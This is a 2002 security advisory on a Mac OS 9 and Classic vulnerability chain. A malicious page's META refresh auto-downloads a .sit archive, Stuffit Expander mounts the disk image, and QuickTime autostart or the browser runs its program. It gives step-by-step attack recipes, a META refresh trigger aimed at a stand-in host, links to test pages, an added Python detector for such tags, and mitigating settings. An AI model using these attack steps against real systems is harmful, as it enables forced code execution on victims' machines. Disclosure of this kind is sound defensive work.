28th Feb 2002
COMMAND
Arbitrary file executions
SYSTEMS AFFECTED
Mac OS and Mac OS X with Classic Environment
Details :
=======
MacOS 9.x, and Mac OS X with Classic environment*1
(probably System 7.5.x or higher)
Quick Time 2.0 or higher version (probably)*2
Stuffit Expander 5.x or higher version for Mac OS
Stuffit Expander 6.5 or higher version for Mac OS X*3
All browsers and network clients using Stuffit Expander as a
post-process for downloads*4
*1: Mac OS X on its own is not affected.
*2: "Autostart CD-ROMs" has been supported since QuickTime 2.0.
*3: Stuffit Expander 6.0 for X is not affected.
*4: Netscape 6.x and Mozilla show a dialog before download.
*4: OmniWeb 4.1beta11 is vulnerable, but 4.0.6 is not.
*4: We've tested Fetch 3.0.3, NetFinder v2.3.1, Vicomsoft FTP
Client 3.0.1. These are vulnerable.
PROBLEM
vm_converter <vm_converter@mac.com> and FUJII Taiyo
<taiyo@vinet.or.jp>, in their advisory
[http://homepage.mac.com/vm_converter/mac_autoexec_vuln.html] :
If a victim merely browses a malicious web page :
1. The browser automatically starts downloading a compressed disk-image
file which includes a malicious program.
2. An archiver (such as Stuffit Expander) automatically expands the
compressed file and mounts the disk image.
3. Mac OS (QuickTime) executes the malicious program included in the
disk image. This depends on the QuickTime settings.
These 3 steps happen fully automatically and finish in an instant.
This vulnerability builds on 3 vulnerabilities and arises from the
complex interaction of several pieces of software. To explain it, we
summarize these 3 vulnerabilities below.
Vuln.1 (already announced at Bugtraq)
"Macinosh IE file execuion vulerability" [BugTraq] 2002 Jan.22 from
Jass Seljamaa. He reports the vulnerable systems as "IE 5.0, probably
earlier, on Classic systems(below OS X)" in that post; however, the
vulnerable systems which we found are :
Microsoft Internet Explorer 5.0 through 5.1.3
iCab Pre 2.7 and 2.7.1
This means malicious users can execute local programs on a Macintosh
through web pages. However, they can only execute programs whose full
file path on the Macintosh is known to them.
Vuln.2 (probably announced in Japan only)
The day after Vuln.1 was reported, a Japanese user, Mr. Mori, presented
another vulnerability related to Vuln.1 at "Security Hole memo" (written
in Japanese).
http://www.st.ryukoku.ac.jp/%7Ekjm/security/memo/2002/01.html#20020123_macie
This vulnerability, similar to Vuln.1, is observed when a web page
that uses the META tag shown below is browsed.
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/some.sit">
After such a page is browsed, malicious programs are downloaded
automatically. So malicious users who combine Vuln.1 and Vuln.2 can
force victims to download a program and execute it. But to force
execution of the program, the malicious users must know the full
file path of the download folder on the victim's Macintosh. Vulnerable
browsers (in our test) :
Microsoft Internet Explorer 4.5 through 5.1.3
Netscape Communicator 4.78
Netscape 6.2*1
Mozilla 0.9.7*1
iCab Pre 2.7 and 2.7.1
Opera 5.0
OmniWeb 4.0.6 and 4.1beta11
*1: Netscape 6.2 and Mozilla show a dialog before download.
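A defensive check for the Vuln.2 trigger, as an added example that is not part of the original advisory: it scans HTML for META refresh tags whose target is one of the archive types named here (*.sit, *.hqx, *.bin), as a filtering proxy or mail gateway might. The function names and the sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Archive types the advisory lists as auto-expanded after download.
ARCHIVE_EXTS = (".sit", ".hqx", ".bin")


def parse_refresh(content):
    """Return the target URL of a refresh CONTENT value, or None."""
    parts = re.split(r"[;,]", content, maxsplit=1)  # "<delay>;URL=<target>"
    if len(parts) < 2:
        return None  # plain "reload after N seconds", no redirect
    target = re.sub(r"^\s*url\s*=\s*", "", parts[1], flags=re.I)
    target = target.strip().strip("'\"")
    # Browsers drop tabs and newlines inside URLs, so a wrapped
    # attribute value still resolves to a single target.
    return re.sub(r"[\t\r\n]", "", target) or None


class RefreshScanner(HTMLParser):
    """Collects META refresh targets that point at archive files."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):  # names arrive lower-cased
        a = {k: v or "" for k, v in attrs}
        if tag != "meta" or a.get("http-equiv", "").strip().lower() != "refresh":
            return
        target = parse_refresh(a.get("content", ""))
        if target and unquote(urlsplit(target).path).lower().endswith(ARCHIVE_EXTS):
            self.findings.append(target)


def scan(html):
    scanner = RefreshScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: the advisory's tag (wrapped across two lines), a benign
# refresh, and a variant with comma separator, quotes and a query string.
SAMPLE_PAGE = """<html><head>
<META HTTP-EQUIV="refresh" CONTENT="1;URL=http://somewhere.com/
some.sit">
<meta http-equiv="refresh" content="5; url=/news.html">
<meta http-equiv=Refresh content="0, URL='http://files.example/pkg.HQX?x=1'">
</head><body>hello</body></html>"""

if __name__ == "__main__":
    for url in scan(SAMPLE_PAGE):
        print("refresh-to-archive:", url)
```

Because *.bin is a common extension, a hit is a reason to hold the page for review rather than proof of the attack.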
Vuln. 3 (we found, probably announced in Japan only)
Building on Vuln.1 and 2, we found another vulnerability: malicious
users can launch arbitrary programs without knowing the full file path.
Step 1 : Make a disk image that contains a malicious program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx and *.bin
are also effective)
Step 3 : Upload this *.sit file to some website and prepare a web
page using Vuln.1 and 2.
Step 4 : Victims browse the web page and the *.sit file is downloaded
automatically.*
Step 5 : Stuffit Expander automatically extracts the *.sit file and
mounts the disk image.
Step 6 : The malicious program in the disk image is executed
automatically by browsers.*
*Step 4 is based on Vuln.2 and Step 6 is based on Vuln.1.
Because a disk image is used, malicious users do not depend on the file
path of the download folder. They only need to prepare malicious
programs and web pages. Stuffit Expander plays an important role in
this vulnerability: it automatically extracts archives and mounts disk
images. Then, by way of Vuln.1, browsers execute the program.
Vulnerable systems (in our test) :
Stuffit Expander 5.x through 6.5.1 for Mac OS
Stuffit Expander 6.5 or higher version for Mac OS X*1
Microsoft Internet Explorer 5.0 through 5.1.3
iCab Pre 2.7 and 2.7.1
*1: Stuffit Expander 6.0 for X is not affected.
We made a test page for this vulnerability. Please try it.
http://www.u-struct.com/diary/img/20020126_IE5issue_noJS/
----------------------------------------------------------------------
Auto file execution vulnerability in Mac OS
----------------------------------------------------------------------
Building on Vuln.1 to Vuln.3, we explain the "Auto file execution
vulnerability in Mac OS". This vulnerability, which we found, uses
Vuln.2 and 3 but not Vuln.1. It is caused by the complex interaction of
several pieces of software, such as browsers (and network clients),
Stuffit Expander and QuickTime. It resembles the computer virus
"AutoStart9805", which uses the "Autostart CD-ROMs" feature of
QuickTime. In this way, similar to Vuln.3, malicious users can launch
arbitrary programs without knowing the full file path.
Step 1 : Make a disk image that contains an "autostart" malicious
program.
Step 2 : Compress this disk image file in *.sit form. (*.hqx and *.bin
are also effective)
Step 3 : Upload this *.sit file to some website and prepare a web
page using Vuln. 2.
Steps 4 and 5 are the same as in Vuln. 3.
Step 6 : The program in the image is executed automatically by
"Autostart CD-ROMs" of QuickTime.
In this vulnerability,
1. the browser downloads the *.sit by way of Vuln.2.
2. then, Stuffit Expander automatically extracts it and mounts the
disk image.
3. and then, QuickTime executes the program in the image.
These are the initial settings of each program. It's teamwork. It only
takes one click on a web page to start automatic download, extraction,
mounting, and execution. Furthermore, if victims manually download a
malicious disk image with browsers or other network clients (like Fetch
via FTP), automatic extraction, mounting, and execution will start.
uuEncode Exploit :
================
From [http://www.u-struct.com/diary/img/20020131_OSissue_E/] :
When your conditions are fulfilled, "Exploit_HD_OSX.img.sit" is
downloaded and extracted, the disk image "Exploit_HD_OSX" is mounted,
and the application "openTrash" is launched automatically. "openTrash"
is an application that shows the prompt "This application opens trash
only" and only opens the trash.
SOLUTION
Change the initial settings of each item below.
In Mac OS : required settings
- "QuickTime setting" control panel > "Autostart CD-ROMs" > turn off.
- Stuffit Expander > preferences > Disk images > "Mount Disk Images"
> turn off.
- Change the initial volume name (e.g. Macintosh HD) to something else.
- Change the initial "Download Folder" (e.g. Desktop Folder) of
browsers to another folder.
more secure settings (not required)
- Stuffit Expander > preferences > Expanding > "Continue to expand"
> turn off.
- Each browser and network client > its preferences > change the
download setting that uses Stuffit Expander as a post-process to
"save to file"
- Each browser > its preferences > change download settings to
"disable" *
* for example, in Internet Explorer, set the "Security Zones" to
"high" or "custom" (File downloads to "Disable").
In Mac OS X with Classic environment :
- Classic's "QuickTime setting" control panel > "Autostart CD-ROMs"
> turn off.*
- The others are the same as in Mac OS.
* "Autostart CD-ROMs" is influenced by Classic's "QuickTime
setting". So, when the Classic environment is not booted, Mac OS X
is not affected.